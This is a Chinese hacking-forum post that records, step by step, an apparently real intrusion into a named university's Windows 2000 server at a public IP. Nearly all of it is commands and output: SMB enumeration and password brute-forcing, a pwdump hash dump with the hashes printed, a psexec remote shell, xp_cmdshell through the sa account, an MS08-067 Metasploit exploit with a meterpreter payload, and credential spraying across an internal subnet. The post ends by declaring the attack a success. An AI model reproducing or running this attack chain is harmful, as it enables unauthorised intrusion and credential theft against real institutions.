找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3049|回复: 0
打印 上一主题 下一主题

nmap+msf入侵广西师范

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 12:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
广西师范网站http://202.103.242.241/
& A& t# _% Y* y8 \) @
4 `- r+ D- G+ N& ]root@bt:~# nmap -sS -sV 202.103.242.241
: g7 P6 ~9 r6 r* q3 c% a3 J; g% ?! _% D  S( {7 J. M- ]
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST/ f% z3 z7 G  P, a# m% Q

$ _1 G: _4 {- y5 E! ZNmap scan report for bogon (202.103.242.241)/ W- [$ r$ U7 q( k* I  u; w

- M1 G& C: g$ M8 Q* V  x! N% z8 UHost is up (0.00048s latency).& _( {6 Y  [6 q* o/ P6 n

" I; U, g7 P! |Not shown: 993 closed ports
) W( H3 o* \8 F) u0 B# f9 `: u% q3 B# \% b/ z5 G) p+ `# u5 }
PORT     STATE SERVICE       VERSION) v9 n, C- C2 }$ S7 V$ e
! h! d" \1 J, Y- u: G; K
135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
) ?6 \. `* x  t3 E; z+ ^
# D7 i7 r4 ?: K! k" L& d139/tcp  open  netbios-ssn6 Q9 z) K1 H" ^! M
0 ?7 s4 }, a- b9 Z$ |1 }
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
, i& I5 i4 h0 {  `2 e
5 Y2 H$ X3 n$ l5 ]2 d1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)8 L& X* E1 Y3 W5 I! v
: Y2 V/ H% t# n
1026/tcp open  msrpc         Microsoft Windows RPC
+ S; R3 O) K+ t/ |1 p' v
  ~- i: |4 \  [3372/tcp open  msdtc?
6 I4 y& P  H  x& |
. \* b+ }, Z5 u% P6 y3389/tcp open  ms-term-serv?. R5 i- X1 H* \2 i+ _- [! l: p7 v! K* X
. R% P3 l; a0 O- @# m
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
8 o. S' b5 d: d; p) S1 k- BSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r; [- ]  J7 O: f4 k& I/ x
, A- n" Z/ |# t5 r6 }. k4 a
SFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
* {- E* o2 j! @9 Z5 b7 h: H0 G& Y) x. m: P$ |# ^/ |
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)  w  I- G$ ?8 z% ]6 s

& m- n6 G! H! wSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO, i4 o2 A2 h4 u( h+ n& K: [$ U
& S! O# E' p. @9 Q# b( ^5 G
SF:ptions,6,”hO\n\x000Z”);* N. u5 N$ g. ]3 P% s

2 e" D4 A8 v* M$ gMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
3 Y' ]4 E6 o3 {* C
1 ~7 T% b# x4 f) d: w% G, E2 _Service Info: OS: Windows
* j% c( n$ A  n5 f" ?7 U% S( U. W2 y8 ?0 v: M
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .# v7 D' j  f  H8 ~# y0 `& U3 V

  Y7 z- E* _$ p% H& s' GNmap done: 1 IP address (1 host up) scanned in 79.12 seconds: v4 K3 F4 O4 t1 o0 z5 o

% `3 @4 G+ j  `/ o5 q- ]. Croot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本, G+ n" R3 s) h4 `4 @8 Q3 A6 Q

+ i3 ~5 F' `# H' D4 x-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
* T7 v* Q" Y6 \8 r; w) c# y+ p% h* W
- [8 c% C* F+ C-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
7 `  g7 S0 j) ?! `5 ]  g
5 ~  y. N+ k& s5 J-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse7 Z" K7 g# k9 a! {

2 l% b7 D! V. v-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse: w) z: l* s5 Y4 t
7 V8 J4 b+ y* m! Y' ?8 _
-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
; u( j( A( S7 u! X5 w" R& K7 j
+ O3 s# |; }+ W5 F-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse. Q% ]/ f5 @5 s) n: O- C+ y1 e
' i3 w7 v& A7 L- j3 x
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
0 ~  @* t' D7 @$ Y
$ ^1 z7 z5 T4 }2 k( [: U-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
. C1 Y+ o& g$ T" {6 h2 G& f- Z2 f4 L' V- |
-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse
) I2 U4 G7 v6 P" ^: J3 l- ^
( b) n4 p+ F  m0 D-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse# E$ S+ v, {- t
' m2 i/ |% f2 }" L. F8 ~
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse1 s& v+ g4 W) q+ s
- y4 s- n7 g1 {6 X& R- a
-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
  V  Y7 e6 }, @! D6 C0 G
" w' G7 C* ~$ Y) R& n-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
* W1 h" P# Q; D: {( Y( o: m6 H! B# |
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse& z+ Z  I/ ^! x7 U3 G+ J/ @# C
+ C4 f  i+ R$ `) l* O+ c  F
-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse  T7 |# g4 d! x. N
- n# K2 r, r  {4 K. {0 r( [
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   
% q- o& ^+ J  U5 o3 s! o0 w, }
( ]) i9 c( d! X//此乃使用脚本扫描远程机器所存在的账户名2 W: Z+ v3 M7 Q- l( q3 X

6 V: a8 R5 b1 O' D# B$ k" d1 HStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
7 w5 \( U, N8 n' |5 ]7 P
3 j2 o- s+ Z- f, U2 `  e( s5 pNmap scan report for bogon (202.103.242.241)6 G+ O7 B- V) e& C

# c7 v  |+ r! _2 A) N- i8 Q6 J5 UHost is up (0.00038s latency).
3 x* B1 O# @, h. ^
  T" R$ r1 e- }# M* i( ^Not shown: 993 closed ports
# k+ u; X( @8 s' L& K( n" D9 k* Q
8 J# x1 f1 q" `) M* e; y! uPORT     STATE SERVICE
0 k, P( K4 Z6 j1 ?
6 j2 U" U( n; S' `135/tcp  open  msrpc
( ^' z0 d& B! I7 J% o4 {
( U. f  K/ @# C. {139/tcp  open  netbios-ssn  z( O6 n% i0 P2 h5 \9 ^& y5 h
9 m* \4 b. m6 p  ?
445/tcp  open  microsoft-ds
; ^+ _% `3 q! u: D/ u/ \  D5 H6 L
  j  s* @7 C8 f0 J/ G0 r1025/tcp open  NFS-or-IIS, ?) h. I8 P. D, u
  ~3 `$ L  H/ e1 G% `  X, O- W
1026/tcp open  LSA-or-nterm! |' s0 K7 Q* s1 v: M* p9 B

; b: }: m( _6 W$ D3372/tcp open  msdtc
0 B3 Q7 y2 F$ e' f; V3 I7 c, B1 c2 h# N+ \
3389/tcp open  ms-term-serv7 u* a- A! [6 `* T7 ~$ J3 d( b* K

* W* X9 q$ J' U5 m: N3 KMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
- m$ T. e4 k" V; ]
- n; D7 n7 a& J0 a& t/ sHost script results:6 I# l4 g- p4 ^8 x
4 Z. q, `" u% ~' Q- b, `" s1 l$ h
| smb-enum-users:
: m1 [" s# c% N
# H7 j; r9 j$ f% ]' W|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果+ V& p+ @" Q6 e' g

. o" t# b0 o; ZNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
2 W) ]1 c- W3 y) p
% V' Z1 B+ C1 _! Q2 |2 jroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
# ?; l# \$ a3 m
: e) d! u& e7 R* C& W; X//查看共享
+ I, A' b5 W! l/ M. e+ n8 c% I3 R+ G/ Q* ?/ a
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
) C& R4 e+ g9 F% e+ i3 F4 |- @& n" |: n$ U
Nmap scan report for bogon (202.103.242.241)) b) {( Z9 E7 ?2 @0 V4 J

% m  g+ f/ [* A# Q4 A  @1 lHost is up (0.00035s latency).
- x0 k. X; h$ ~0 @4 _  ^5 N! B' e' X8 e( [' C4 f$ ~  i# ]
Not shown: 993 closed ports9 c8 a' O1 f* P& _
: A( ]4 A! t3 q* N$ N/ ^
PORT     STATE SERVICE, N. n1 j% C7 R$ c* w1 U. Y
% X* ~' a8 w+ y- @; ~
135/tcp  open  msrpc
# z9 W! z( I% r+ H8 ?% c
' e1 W1 X) m" r" T139/tcp  open  netbios-ssn
; c1 o. K; w" b3 g
) A! B7 V  G! _8 y+ N1 a445/tcp  open  microsoft-ds
# Y, \. z5 N6 ]0 H; K- E" E0 f. U" Q3 u! B( `0 p3 k5 L6 }; Y
1025/tcp open  NFS-or-IIS3 X+ Q- v6 `. s- V& y* @; E  o) b

* F) X( ?: S0 Y& {& O- O1026/tcp open  LSA-or-nterm
8 }% Y* j1 U" ?9 ^0 y, A7 o8 F6 Z# D8 i. j0 ~- x3 m- _2 N
3372/tcp open  msdtc
' a8 _, k- c6 Q, H. l# a4 A3 x& @- v7 V/ t! R( |3 D2 s# q
3389/tcp open  ms-term-serv6 ]+ O9 |: v9 M* r1 D* `

" P0 B' ^8 g/ K4 a+ a. `MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 k, ]6 b" s. V; Y# f
3 r+ \8 P* Z$ \3 h9 V2 C" `+ v  ZHost script results:
( O$ _% N4 E- r2 T( Y$ r$ C7 b  y% V2 m
| smb-enum-shares:2 m8 u% L- |. z, T  |

3 d  o9 F) M9 e2 o& M|   ADMIN$
! {+ v+ c" G4 Y& w% q' g, Y4 j  n* k0 M6 w
|     Anonymous access: <none>7 ~3 N% ?& E' p

  s8 f) N8 Y* t& r# L|   C$
+ T* `, \* L  ?1 y/ n8 n3 g" \2 [9 w+ @5 e
|     Anonymous access: <none>
$ q- v7 f! z& X# ~
$ n7 X: r. e9 w5 H' `: {+ i$ M" ?|   IPC$
& N! V+ T: f( `$ U+ D
. R: A$ @) H0 G8 A6 B|_    Anonymous access: READ% J0 k% l. x# y  Y' }
4 V5 Y. O4 S- ~; h7 _: R6 J
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds# {+ \  V( [+ h' K
8 t- e1 L# H( r# R, W* z; a
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241       # Q5 ?  T; a; c- N

" U: {( w# H9 @( o. p//获取用户密码3 a5 O, e" D! C  k

, M- x. r+ M4 s! zStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST. h  i  E: i: _2 B( a# a
7 {* w3 o9 P' V
Nmap scan report for bogon (202.103.242.2418)9 e) {, u3 M2 M5 y
5 b1 n  Y6 {% i/ ^) O: Q, I8 l
Host is up (0.00041s latency).
, H9 h/ Q" Y) V4 \
% I- N: S9 A! p; M, A* R. t5 xNot shown: 993 closed ports1 k# s& d; z' w# l

; `! j' y  S2 }7 rPORT     STATE SERVICE
6 `& A5 e: t& [4 h2 f! a) U+ ~
0 y  A# R% z. q" j0 P; C135/tcp  open  msrpc/ F% p4 V2 [/ S* e/ y( K8 I! X

5 M1 b( b: l9 |- m139/tcp  open  netbios-ssn
& W0 m  M2 i0 ]2 [8 u. }+ n$ Z6 v( Z
6 [0 |" Y( Q% N  U/ l0 X" J445/tcp  open  microsoft-ds- _. R7 v4 [# q3 Z

4 k1 Z' f0 Z' A9 f! }& @1025/tcp open  NFS-or-IIS
4 A3 |# V8 y  ^* r" s+ L/ |
& e# {* F. D, d4 X* U: ?# v' ?% k1026/tcp open  LSA-or-nterm
& L  s7 p% y: k0 p
% j8 e9 [# w8 h- U3 V7 w- [3372/tcp open  msdtc
- r4 c. ~' ]0 G/ W1 f, S1 Q4 `% `8 \
$ U. ]9 z6 ^; l# H5 r8 J3389/tcp open  ms-term-serv
1 q% C9 p2 T7 e" V9 u( K, g/ Y. Z% ^7 v2 S% m2 E9 \* M
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
; Z* ^2 e- s. k6 E7 R: T! q- s0 ~! p5 A5 T$ ~" t
Host script results:! i3 L$ x5 u- u. i) {

. x+ P# Z& B1 y$ Y( j" C| smb-brute:( h# m, b$ M4 e8 x+ b$ g

4 n8 k: @+ X" }8 L& I* Oadministrator:<blank> => Login was successful
" w/ b7 ?8 q* B9 V& D' k! a+ Q7 ?
4 W& c/ c  y  d- {- a|_  test:123456 => Login was successful
6 z8 \2 R+ _9 v3 P8 b8 K4 }2 n: q5 A3 W0 M+ |
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
! W6 x9 |" ?+ M! O( g% b) P7 O) j2 E8 z9 a; ^% p. y6 g
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash% [+ p9 V. m6 k

) H' P5 b- T6 X8 `( D* rroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data+ j" f. k+ [7 u

6 y) p0 }) n2 t2 ^* N- `root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse+ [; u3 q! E" a# i) O
; l% c9 j; l' A6 ^* U
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139$ Y! v9 c, T# I; y" g

1 Y+ U6 L7 u" {/ t1 RStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST# b% K: i3 O5 ?6 i0 ]5 r" ?

  S$ d  N7 {/ B8 TNmap scan report for bogon (202.103.242.241)3 x2 l/ {% B1 C5 ]2 i, W" g$ u

$ x4 I  h  }( G( Y  eHost is up (0.0012s latency).+ `6 a6 Z& ~8 K4 @6 A

2 A, {: N0 H7 [2 APORT    STATE SERVICE
# L' Q. L: Q" s0 \+ ~2 h) F; }, E5 F) F4 L9 Z; I
135/tcp open  msrpc( \; M) E" F6 ?: i: X( Z' |% q+ T

) r( P, _* n9 c; m139/tcp open  netbios-ssn
. E2 B; u* v  f# N0 ^& E3 `
  q/ G5 n. _8 e* f8 Z& k445/tcp open  microsoft-ds: [% m  b: F; n4 Y* i

! q0 N8 F8 H2 L" z2 f; LMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)) i" o2 W0 W/ y0 M) y

! S5 |+ @! w$ C2 S, AHost script results:
' R" v* o9 T1 B5 {2 l
, j3 g6 r) i7 y8 E$ S6 V0 |& y| smb-pwdump:
( P  C4 u/ }* [, N# i
" m. n; h$ u* d6 P, }$ d' V/ S| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************7 \# j4 ^; L/ L# o4 ~- }8 }3 u' \$ R

- z/ W/ K4 T3 `5 W/ s| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
# C- J* _! S1 h9 i' @
8 ]3 h! ^9 R- d. B3 Q0 M| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4) y, h1 ~/ h2 r% @0 t
- |& j; p2 |, J  g% U7 {
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
  f1 J6 F% O1 Z8 f4 u% B, E+ O6 y0 i" |8 ~; d
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
$ j4 h5 ~* t5 M: x" w5 d* H
( T6 o! d& C$ @, n8 vC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell
& Z8 @: k1 T, V1 X% [6 L! V. b. \+ T6 o0 o% C
-p 123456 -e cmd.exe
# ?6 @/ t- z  L4 q) P0 P/ o
' l) }% |# ~' s: N, ?PsExec v1.55 – Execute processes remotely
9 W' y; ^. M5 d6 n
( K& p8 Z8 Z% T& m4 b5 J$ X4 ?Copyright (C) 2001-2004 Mark Russinovich6 w* m9 H2 ~  G

; H3 Q$ h8 q$ p' |9 HSysinternals – www.sysinternals.com
# ?$ m5 U  N& K; Z! E/ r  N+ @) m% Y+ \) x" i$ ^: @! F, N. N3 ?
Microsoft Windows 2000 [Version 5.00.2195]: o2 r$ j9 }+ w9 V, @: P1 y! {  J% `
8 e( T& B2 N+ F3 f
(C) 版权所有 1985-2000 Microsoft Corp.. ]" r  K3 P7 p% q
' |- S# I. E7 N( M6 O2 ~
C:\WINNT\system32>ipconfig
- p4 a" c8 C: t
& U1 V3 ]# v, bWindows 2000 IP Configuration
2 m! a; r; H2 l5 I; W/ l7 s, b3 {* w' n. [. Z7 \
Ethernet adapter 本地连接:
% O) \. E5 ]6 W
9 f( T. _; [/ J9 W' u3 `: uConnection-specific DNS Suffix  . :. C: g9 l$ K1 J2 F. l0 x# b

" s* E- p1 U; m& V4 F8 oIP Address. . . . . . . . . . . . : 202.103.242.241
' F8 N1 k. F  j7 r1 F9 a' K5 b7 j* o) b( W9 Y% A" u) V
Subnet Mask . . . . . . . . . . . : 255.255.255.0& P8 d+ A8 ]1 b' w7 q: Z
/ J% \7 Q3 \9 v" x' ~1 Z5 ?% g
Default Gateway . . . . . . . . . : 202.103.1.1% ~5 s; u: x- {  O
" ]$ `- \, z: q, p1 I1 ~/ B, l
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令7 x; B5 e' X- Q/ k

) a; u0 P% q' Y4 c$ p2 Aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞
9 f6 F  O: F& \: F- |% ~9 x
0 F1 B5 L4 w, m9 j: ~/ MStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST7 k1 J2 ~6 k2 h. X6 [: y# R
. E2 l/ R3 |( U  X' G6 q1 k5 @
Nmap scan report for bogon (202.103.242.241)
% l/ S) G  k6 d$ y# W
3 `  ?; W2 n* w; xHost is up (0.00046s latency).: R6 i: q0 `+ P3 ^
4 B- g. J4 w. |2 Z2 C3 i
Not shown: 993 closed ports  o& |5 }9 V1 @5 u
0 _! J8 x$ q7 Z# _4 t! E# [
PORT     STATE SERVICE7 c. G, m+ G' w6 F5 A) G4 R' J

- D& W6 }% K6 R& e0 i8 s& `6 L135/tcp  open  msrpc  Q# R3 f' g5 T  f) a
  o* m' A7 D7 S7 b2 n( Z) L
139/tcp  open  netbios-ssn# U7 y7 ]! u% Y

* Z! B4 E* D$ s- c5 W# K  e6 B445/tcp  open  microsoft-ds
$ g: t( Q/ n# y% d6 [
: s+ \) O: t. V/ q+ q1 m: _1025/tcp open  NFS-or-IIS0 i2 x3 i& C) z* X* `+ z

( n! j& l5 d1 W1026/tcp open  LSA-or-nterm" O' |( w+ c' q' m# t3 h7 c

) H  r7 I% X; d/ W2 E3372/tcp open  msdtc
! a3 V8 x, x& ~, _" O1 N" L1 v+ h2 B8 t8 e! Y" Q
3389/tcp open  ms-term-serv
2 `4 \9 Q2 r, k5 v: {) I* N: _, }
% N6 W8 y9 B$ q& v* c2 V, X3 NMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
  h6 {* J$ E; G; l6 t/ I* ~* f" J/ g/ M+ a
Host script results:
) `+ ~$ g3 s8 Q2 k' l2 G/ p% b" p5 @4 ]$ t9 K1 ?5 [
| smb-check-vulns:
! t7 P: [& i! `
. `# Y/ s. ~1 ]' G. N/ l|_  MS08-067: VULNERABLE
5 J9 W0 J& t* S3 C- Q- }/ `! b9 Q- C4 X' I# k$ W& l
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
6 }1 n+ ]  q3 v- p8 b8 ^1 v, u  ~8 l" f( r9 F6 O
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出
& Y0 d$ f4 m$ l8 J3 ^' G( G4 ^
* R- }: L' T7 L8 I& |msf > search ms08. |- P1 n# \% E+ K. J
" M: U- S( \" h0 U* E
msf > use exploit/windows/smb/ms08_067_netapi
5 ?2 \% b6 |( y% y- c# [* f: F% n( P0 B
msf  exploit(ms08_067_netapi) > show options. v. O0 ^7 Q* p5 D& |- O( h* [6 I# ^) ]

/ N5 R& W- m, E. u; ]' Qmsf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
2 L' O# \! S0 [1 B  N; j/ K, a# ~+ C  ?
msf  exploit(ms08_067_netapi) > show payloads6 f2 G6 _3 w- V0 Q/ Z
  S; ?5 j( N  }* X6 }" y3 |7 z1 l
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp6 p: O+ [9 _  b
0 Q5 t+ O2 X  ?
msf  exploit(ms08_067_netapi) > exploit1 H  ]0 o3 t$ i: m) d

, d8 q  U  z9 f8 h- X4 ^; rmeterpreter >
' N$ b. b# p% X" l1 B
/ j, j  c  n8 y* W: ]Background session 2? [y/N]  (ctrl+z)
/ J5 O# _; y4 L! A( X
, Y& a- h3 E9 U/ K) [& F" {0 O7 `msf  exploit(ms08_067_netapi) > sessions -l
, K; i" W  Z% t% Z1 x
* L0 i: s7 u4 T6 Q1 m) j6 `root@bt:/usr/local/share/nmap/scripts# vim usernames.txt  y0 X- d4 ]4 k0 X+ S+ E& ~% h
) J" }6 }- d: u0 r0 C/ C
test$ ~3 ?$ Z$ p& z& ?) X
5 _8 p3 Z+ S6 E  A- u
administrator
9 A/ l$ E! J& w: v
1 e, D  Y9 P; g/ N! ^! g8 xroot@bt:/usr/local/share/nmap/scripts# vim password.txt. d: `! x( F/ H1 h
5 }7 e8 C- Z2 {9 O+ [  Z3 o% N
44EFCE164AB921CAAAD3B435B51404EE
- W& K8 x2 Z; t  ]7 v2 ~" P0 |0 u4 [  c, g0 Y
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
4 H5 Q" N  y2 E5 ]4 v
; G/ o- \5 @& A6 D9 M  t+ r( l //利用用户名跟获取的hash尝试对整段内网进行登录
/ J3 ?" X% I5 I! d3 s# g, Z2 g* s; ~, o
Nmap scan report for 192.168.1.105# f/ ^0 ^" u$ T% h! m

! O) c; G+ |: u' X0 RHost is up (0.00088s latency).
) U: D4 s, T* |  F  Y) o/ @. [2 T) c4 v9 ^# `% F" N
Not shown: 993 closed ports
' x8 K5 C# |& e9 ]1 B2 U( F: x
5 [5 z6 y' O- ]* ~) w7 q3 m1 kPORT     STATE SERVICE# U# @* g7 N8 S: I( ?5 v# @& b% L
7 Q7 p# A" u2 p* Q2 c
135/tcp  open  msrpc
. e: k. w) t6 e2 V- E. t, t+ {; h( f$ A$ W- K
139/tcp  open  netbios-ssn
5 _; H: M4 ]5 E8 @0 v/ P* e# C: D! O- X/ G5 _; Y2 q+ V
445/tcp  open  microsoft-ds
- M$ F% i7 o0 P, l; M, w+ [* ]
+ y5 `/ S" N9 f, X) ^1025/tcp open  NFS-or-IIS
4 E0 G' f* N$ _" ?6 a1 E: n' |' M2 ~* i+ W
1026/tcp open  LSA-or-nterm
' K0 r5 i- X- o
, I3 z: X$ R& n& G! m5 k3372/tcp open  msdtc9 k3 _: v% l% S  D4 \
+ K& H, }! i1 A/ a- y
3389/tcp open  ms-term-serv
" G& |: k8 j5 z/ B. m( ^+ M" d$ ]) t6 W0 H) `9 ?: q. j
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
) i: a/ O% }! m9 F. \# J* L' G- q$ @! J" G
Host script results:
. |, ^1 x1 b* b$ L( h* a9 u6 E1 I
5 G8 s* z" y4 L- g8 M* f| smb-brute:0 c4 V5 v' o4 M! c

6 p( l% T; B% @: F|_  administrator:<blank> => Login was successful+ p/ v; r- p# k3 O

+ J3 u: Y6 G; `' n) c攻击成功,一个简单的msf+nmap攻击~~·& g% J4 ?& q* M: y+ w

; J# L7 {$ C5 \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表